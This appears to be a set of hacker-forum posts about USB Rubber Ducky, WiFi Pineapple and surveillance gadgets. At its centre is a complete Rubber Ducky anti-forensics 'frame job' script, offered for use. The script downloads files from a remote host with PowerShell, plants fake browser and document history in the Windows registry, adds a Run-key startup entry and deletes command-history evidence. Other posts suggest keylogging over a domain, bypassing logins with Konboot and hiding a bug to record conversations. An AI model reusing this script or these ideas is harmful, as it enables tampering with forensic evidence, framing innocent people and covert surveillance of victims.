br0k3nilluzion

Im interested in how you would do it as well Jermain69.. Here is a way that has been done and is tested to work for Kali on Nexus 7 (2012) http://w11.zetaboards.com/Pwnie_Express/topic/9605021/1/

A youtube video of it in action as well

Found this while studying. Interesting.. Hope you guys like it. http://www.informationwarfarecenter.com/Cyber-Secrets.html http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt REM Calling this the rubber ducky frame job. This adds fake information into Windows Registry areas forensicREM analysts use to track internet usage.REM Author: Jeremy Martin - jeremy@informationwarfarecenter.comREM Class: Anti ForensicsREM version 0.1.3DELAY 1000GUI rDELAY 1000REM Download a file and save it into the temp folderSTRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/CIR/CIR.pdf','%TEMP%\latest-CIR.pdf')ENTERDELAY 1000GUI rDELAY 1000Download a graphic and save it to tempSTRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/back.jpg','%TEMP%\back.jpg')ENTERDELAY 1000GUI rDELAY 1000REM Open Intenet Explorer and generate trafficSTRING iexplore.exe http://www.informationwarfarecenter.com/index-4.htmlDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url1 /d http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url2 /d http://www.i-never-went-here.com /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url3 /d http://www.i-never-went-here-again.com /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url4 /d http://www.i-just-faked-the-url-address.com /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths" /v url1 /d C:\i-just-faked-the-folder /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Document HistorySTRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" /v 0 /d fake-data /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Add a startup link for a previously downloaded file. Malware uses this quite often.STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v fakefile /d "%TEMP%\latest-CIR.pdf" /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Changes the background to the previously downloaded graphicSTRING REG ADD "HKCU\Control Panel\Desktop" /v Wallpaper /d %TEMP%\back.jpg /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Opens a previously downloaded fileSTRING powershell Start-Process "%TEMP%\latest-CIR.pdf"ENTERDELAY 1500GUI rDELAY 1000REM Removes evidence of previous entriesSTRING REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Add another fake evidence entrySTRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v a /d "iexplore www.informationwarfarecenter.com/files/BGIU.zip" /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Opens a previously downloaded graphicSTRING %TEMP%/back.jpgDELAY 1000ENTERDELAY 1000

Dont delete your post!! Hook it up woth the rubber ducky. They have the pineapple rdy for u to improve upon. Now you have the rest of your concoction to clean up and make. Lookin forward to seeing how you do it.. Good luck man....

The RavPower is awesome!! I have one of these as well. Plan on using it with the USB rubber ducky.. You could do so much with this baby is crazy! +1 for the RavPower

You could something like Konboot.. even the free one should work if its windows 7 and under...;p

Lol, who doesnt know about L0pht.. That was back in the day with Red Box's and gold box's.. BBS' were the thing too..lmao. Talk about bringing up old memories! I absolutely agree with you here! We definitely need more people that are in the Industry as voices.

I really do hope Hak5 will stay around in one form or another if the hammer falls there way. Hak 5 IS MORE THEN A SHOW. Where else will you get some cool kats like this. Promote intelligent thought, learning new and sometimes difficult things, bring a sense of humor, bring together people do drink some das boots.. and have some freakin fun!! I agree with you digip !! This is just a major play they are making for control over something that they dont really understand. You gotta admit it is a big fulcrum though. More then just a diversionary tactic. Its a major pivot point in total control. What better way to mask what they do on any size scale, global to local...

With the decision of Net Nuetrality hanging in the balance, what is Hak5 (Darren, Snubs....etc) doing to ensure they still exist if it goes bad? Dont you think that the Modding sector, security sector, all things going against the grain, bringing infosec to the masses, will be controlled and shut down. Why would the public need to know things that could potentially harm big business.. for an ignorant mass of people will make them more money then an intelligent group of individuals, no matter how few.. Just a question and an opinion. Whats your thoughts?

https://github.com/lukesampson/scoop Quote from page: What does Scoop do?Scoop installs programs from the command line with a minimal amount of friction. It tries to eliminate things like: Permission popup windows GUI wizard-style installers Path pollution from installing lots of programs Unexpected side-effects from installing and uninstalling programs The need to find and install dependencies The need to perform extra setup steps to get a working program Scoop is very scriptable, so you can run repeatable setups to get your environment just the way you like, e.g.: scoop install sudosudo scoop install 7zip git openssh --globalscoop install curl grep sed less tail touchscoop install python ruby go perl If you've built software that you'd like others to use, Scoop is an alternative to building an installer (e.g. MSI or InnoSetup)—you just need to zip your program and provide a JSON manifest that describes how to install it. thought this might help some of you Ducky warriors out there.

sweet. ducky competition!! Nothing breeds innovation and for products to get better then some healthy competition.. Its a Duck war..Quack attack vs. the Solid Cloud.. It looks like they may have spent some more time on automating programs or scripts to run.. wonder if it'll bypass AV like the ducky can with its scripting. Hmm, theres seems more noobish or script kiddie-ish. I say Ducks unite and quack attack this motha in a showdown..!!!

Second this question.

man, if you can add this to the Rubber ducky.. you could modify it to be able to change the scripts on on the fly.. have a base system, change it on the fly.. all from the convienience of a phone or tablet on hand..!!!!!!!

Looks pretty sweet

Its the one you would see on the hak5.org site

Wonder what would happen to cyogenmod if they really did go all out on an encrypted and all for the user, screw the NSA and government ROM... Sweet dream that would be. Think they would have to give up there source code and algorythms ?

why the heck are you sharing the "C" drive? I take it that that's the main partition.. Dude your crazy. Thats like saying, " Here, explore my share" to the world around you... do Group Policy control and play around with some firewall settings, set limits and give them non Admin accounts on there computers.. There are like a million ways to implement this.. But for fun, try the implementation from Mubix...

whatch his latest Hak5 video, it tells you how to keylog over the doman

lol. Im thinking not a weaponized one for Hak5.. more of the suttle type.. Webcam, pineapple, ubertooth 1, aplha 036nha , etc... Hak5 Slueth Coin. And with a homemade mod of the femtocell for shits n grins

It could be the Slueth squad.. straight Hak5 style. Hmmm, or Digital Ninja clan..

lmao.. Yes I understand. But most of the tools here can be used for nefarious means. I wasnt referring to that though. ;) Who wouldnt want that James Bond coin.. With enough toys Hak5 is so james bond'ish.

http://www.bug-transmitter.com/ Saw this and saw the Hak5 coin.. thought, wouldnt it be pretty neat to have a Hak5 coin that you could place on the counter , turn on the app on your android phone, and you have a conversation recording and playing away on your phone.. This link below is the device being used. Super Simple !! What do you think Darren? This a feasible idea? I know I would love it !!!

i know right!!!! This is like the james bond vehicle for the pineapple.. There is already the Screaming Pineapple, which covers lot s of ground via air.. but what if you need to get in on the ground and maybe get up on a roof or outside staircase.. hmmmm, dare I say the pineapple batmobile??? hahaha, Pineapple Express.. that would be the name of it !!!!

these guys got it to be silent and they use it in an extremely sensitive environment.. http://hackaday.com/2013/02/05/military-steals-idea-of-anyone-who-ever-tied-a-cellphone-camera-to-quadcopter/

add this to the toolset for the Rubber Ducky.. and you now have a pocket full of everything you need. Too bad there wasnt a microsd one of these.. you could change the Rubber Ducky scripts on the fly...!!